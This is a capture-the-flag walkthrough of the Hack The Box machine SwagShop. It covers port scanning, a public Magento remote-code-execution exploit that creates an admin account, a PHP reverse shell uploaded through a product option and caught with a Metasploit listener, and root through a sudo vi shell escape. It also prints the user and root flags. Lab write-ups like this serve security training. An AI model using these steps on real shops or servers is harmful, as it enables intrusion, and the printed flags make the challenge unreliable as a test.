09 Oct 2019 - - Samir Ahmad Malik
+=============+
SCANNING
+=============+
nmap 10.10.10.140
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
+================+
ENUMERATION
+================+
Website hosted on port 80/http — SwagShop – Shoping Site
Using Magento CMS — found it by wappalyzer.
Found RCE of Magento:
command used: searchsploit Magento
Magento eCommerce - Remote Code Execution
/usr/share/exploitdb/exploits/xml/webapps/37977.py
Copy the exploit and edit it, then set your target:
e.g. target = “http://10.10.10.140/index.php/”
and save it.
Now execute it as:
python exploit.py
it creates an admin account with username “forme” and password “forme”:
Now login at : http://10.10.10.140/index.php/admin –» Found this by Dirbuster
I tried to upload php shell, but I couldn’t.
Then I found a way to create a new product– added an option that asks user to upload a file with extension .php
Now make an order of the created product and upload the file php-reverse-shell.
And start multi-handler of uploaded shell on msfconsole
Here you can access your uploaded shell on server:
http://10.10.10.140/media/custom_options/order/p/h/
found media folder by dirbuster.. then did some search after uploading the shell..
Set up listener and get the reverse_shell.
Now navigate to /home/haris/
there is user.txt fie which contains user flag: a448877277e82f05e5ddf9f90aefbac8
+=========================+
PRIVILEGE-ESCALATION
+=========================+
Type Command:
sudo -l and hit enter
Output:
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
Here we found we can access all files from “/var/www/html/” directory and vi text editor from “/usr/bin/” directory with root privileges.
lets create a tty first as it is not there:
python3 is installed:
the command is:
python3 -c ‘import pty;pty.spawn(“/bin/sh”)’
Now, lets edit any file from /var/www/html/ directory with vi using sudo:
cd /home/haris
sudo vi /var/www/html/../../../etc/sudoers
Now to enter into Command Mode and execute the command /bin/sh type in :!/bin/sh and hit enter
and we got root..
Navigating to /root/ directory..
cd /root
cat root.txt
c2b087d66e14a652a3b86a130ac56721
__
/| |/|| |<br />
/| ´ |.` |\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|_|.__| https://hackthebox.store/password
PS: Use root flag as password!
And we got flag in root.txt file: c2b087d66e14a652a3b86a130ac56721
Finish..!!!